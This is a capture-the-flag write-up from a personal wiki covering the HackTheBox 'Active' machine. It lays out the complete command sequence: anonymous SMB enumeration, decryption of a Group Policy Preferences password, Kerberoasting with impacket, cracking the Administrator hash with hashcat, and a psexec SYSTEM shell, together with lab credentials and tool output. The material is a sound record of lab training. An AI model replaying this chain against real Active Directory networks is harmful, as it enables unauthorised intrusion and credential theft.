Write-ups/HTB/Active

From Wiki Aghanim
Jump to navigationJump to search
Active
Platform HackTheBox
OS Windows
Difficulty Medium
Techniques SMB, GPP Passwords, Kerberoasting


This is a Active Directory box. Because of SMB null session, we found Group Policy Prefance encrypted password stored in cpassword. We decrypted that and got credentials for SVC_TGS. Using these credentials we kerberoasting technique to get hash for the user Administrator. I then cracked that hash, and used psexec to gain shell on the machine.



Enumeration

I'll start with a NMAP scan. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.100 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:18 EST
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-23 02:20:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m54s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-01-23T02:21:29
|_  start_date: 2022-01-23T02:16:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.23 seconds


The services running on the machine is:


Port Service Explaination
53 DNS Domain name system. Translate IP to domain.
88 Kerberos Kerberos is an authenticaiton protocol.
135 RPC Protocol that uses the client-server model in order to allow one program to request service from a program on another computer.
139 netbios-ssn Network Basic I/O system. Provides services related to the session layer.
389 AD LDAP Lightwegiht Directory Access Protocol. Protocol to locate organizations, individuals, and other resources such as files and devices in a network.
445 microsoft-ds (SMB) Service Message Block. Application layer network protocol primarily used for offering shared access to files, printers, serial ports, etc
464 kpasswd5? Used for chaning/setting passwords against Active Directory.
593 ncacn_http Identifies IIS as the protocol family for the endpoint.
3268 AD LDAP Same as port 389
5722 msrpc same as 135
9389 mc-nmf Message Framing protocol


Right off the bat we can note that the domain is active.htb.


I'll start with listing shares that are available in SMB. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


Enumerating the share Replication I found a XML file called Groups.xml. 


──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# cat Groups.xml                                                                                                                                                                                                                      1


In that file we get a service user SVC_TGS and a group policy preferance encrypted password. Microsoft released the key for GPP encryption. Microsoft released a patch in 2014 preventing admins from putting passwords into GPP. The patch dosent do anything about passwords that were already available there.


Decrypting GPP password

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ                                                                                   1 ⨯
GPPstillStandingStrong2k18


So we have the credentials for the service account. SVC_TGS:GPPstillStandingStrong2k18.


From the earlier enumeration, I saw the share called Users. The user SVC_TGS have access to that share. 


smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit


Root

To get the credentials for Administrator account I'll use a technique called kerberoasting.


> The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. You can know that a user account is being used as a service because the property "ServicePrincipalName" is not null.

Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required. https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast


I'll use impackets GetUserSPN. Pentestlab have a great blogpost about Service Principle Names 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/svc_tgs -outputfile hashes.kerberoast                                                                               1  1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-01-22 21:18:00.883745


I'll now attempt to crack the hash using hascat. Using hashcat on my host instead of Kali VM allowes me to use the GPU to crack the hash. Even though the hash is probably a password from rockyou, using hashcat with GPU is alot faster than using the CPU. GPU passthroug to VM with a consumer card is a hassle, so I havent done it.


C:\Users\AlaaG\OneDrive\Skrivebord\hashcat-6.2.4>hashcat -m 13100 --force -a 0 C:\Users\AlaaG\OneDrive\Skrivebord\hash.kerberoast.txt rockyou.txt hashcat (v6.2.4) starting ==================== * Device #1: NVIDIA GeForce RTX 3070 Laptop GPU, 7150/8191 MB, 40MCU OpenCL API (OpenCL 3.0 CUDA 11.5.125) - Platform #1 [NVIDIA Corporation] ======================================================================== * Device #2: NVIDIA GeForce RTX 3070 Laptop GPU, skipped OpenCL API (OpenCL 2.1 AMD-APP (3224.5)) - Platform #2 [Advanced Micro Devices, Inc.] ===================================================================================== * Device #3: AMD Radeon(TM) Graphics, 6624/13320 MB (4790 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 421 MB Dictionary cache built: * Filename..: rockyou.txt * Passwords.: 14344391 * Bytes.....: 139921497 * Keyspace..: 14344384 * Runtime...: 0 secs $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$037f289324d5c77c9f1847bf3606e6c6$d1462adf2fb2dd4f89fe5b86993cf73a78103bcdf3d72e5fd629c77005eb512d9bc3ca959e7efba7041b7dae4662f058845ee19e91db9fcb479d671cd60663c69df89e33bff176d803e1cae39378521d208e54df913b8c22cd59f884624626234dadc6aa0f9e6550a583553e78944d017ea871fb966c98d99e2eda0889199407bd462d5f9fae457d8dd5a0b2e686d471fdfe78f94878a0e7e0b5d869b4b17e8539248dd2d86a783064fbb959495de4cb8fd8d9c03fa1f51f4ce8bbd3dc994629823c9ebc3eab68849b05988dc025341eb03869744b193b192e0daffd0b88789b3692300870dc88fe7a08bd3dc86a46151499f90e14836bc2f8f11b93544668356fbdac21b04a0db6d8dedcadb26e03546c65c4ad458d1976996f1ab95390ab298fc0209142747b7ec436d9117cbbd07917ef3b7d864374d936d40b9f16a2716fc075c8000ee8cd8343ce78093f2a6f59175ced3be477df0e2a9624c7bc9838d24909bf7e9bedee33a8361f205a0a5fa6821e5049f4eeee7c65bac97300097e865d086fb241b3180c3cf56d9b3e922e74b499bd5f0a392a2ebdc346bf66e7ff18819243726a4ca926623598e0d7b30be58dcdc972a6143a8591beb22772c506249691be84d0a035194404d560f304cfa636cadb921f06f80747beb82f2f67c9edf37652ad23412e658c7944d72e74cd3994ca40ba454e4a6883ad96d0bcd76c0ec284288fffd7d77ae5c164905915d31fe469a11464154e85bd5bf57592cf49691cf8935d93e65c049821b2272e2352d374ae7c61b7d181af37dc841b8008f5acb79a90270b298fdbbae92a3f11004f4cf5917751820089a9ad99ac607b139cbd0ccb6188ad7fa913fe8b732bc525c34dfbd44b7e27e5aa17da80e635f4f150024489c6ad225144218de4629d9caadf462897c551d6fbbccf53265cb09af16ade88b7ffc323f4861345a459a32531540c0d12ea080ec1ba284a61ad394d7eacee26ddb2317b299c97604905844ef9f499b7263714f324ed7d2fc5328af703968c5f07a08dbd4da65051e887723124d2ca7f1156e9bf04a738fe763069b842f53e7a53206295103a069c4452d071b040908c18ad167842f0dfe48527ac7d7d80a0060fe361d9947b06ba736ec87b87f919536ed2a3cf398f6b3d0a9b45fb50c345b4995dc746ad0746360cbb5ff593800a82f226f1d05fc41fbd2ee10cb18b85702a3580d012a113ab89eb37da7ac85053448fdfc81d8f0c8b495c:Ticketmaster1968 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...8b495c Time.Started.....: Sun Jan 23 20:22:15 2022, (2 secs) Time.Estimated...: Sun Jan 23 20:22:17 2022, (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 3187.8 kH/s (1.07ms) @ Accel:128 Loops:1 Thr:32 Vec:1 Speed.#3.........: 2506.8 kH/s (8.84ms) @ Accel:256 Loops:1 Thr:32 Vec:1 Speed.#*.........: 5694.6 kH/s Recovered........: 1/1 (100.00%) Digests Progress.........: 10616832/14344384 (74.01%) Rejected.........: 0/10616832 (0.00%) Restore.Point....: 10190848/14344384 (71.04%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ace14325 -> TUGGAB8 Candidates.#3....: TUGGA00 -> Sabo2008 Hardware.Mon.#1..: Temp: 40c Util: 6% Core:1559MHz Mem:6994MHz Bus:8 Hardware.Mon.#3..: Util: 39% Core:2000MHz Mem:1600MHz Bus:16 Started: Sun Jan 23 20:21:41 2022 Stopped: Sun Jan 23 20:22:18 2022


We now have the credentials for the administrator account, Administrator:Ticketmaster1968. I can now fetch the root.txt from SMB share. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient //10.10.10.100/Users -U "active.htb\Administrator"                                                                                                                     1  1 ⚙
Enter ACTIVE.HTB\Administrator's password:
Try "help" to get a list of possible commands.
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277665 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)


Shell

To get a shell on the machine I'll use impackets psexec. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-psexec  active.htb/Administrator@10.10.10.100                                                                                                                           1  1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file eUvcjiEp.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service DzMt on 10.10.10.100.....
[*] Starting service DzMt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>


What I've learned

  • Before 2014 AD machines could have GPP encrypted passwords "hidden" in a file. * When pentesting an Active Directory environment there might be many ports open. Enumerating the low hanging fruit is key, so not to get lost or spending huge ammount of time enumerating services that might not have anything usesful. That dosent however mean not to enumerate well.
Retrieved from "https://book.ghanim.no/index.php?title=Write-ups/HTB/Active&oldid=1182"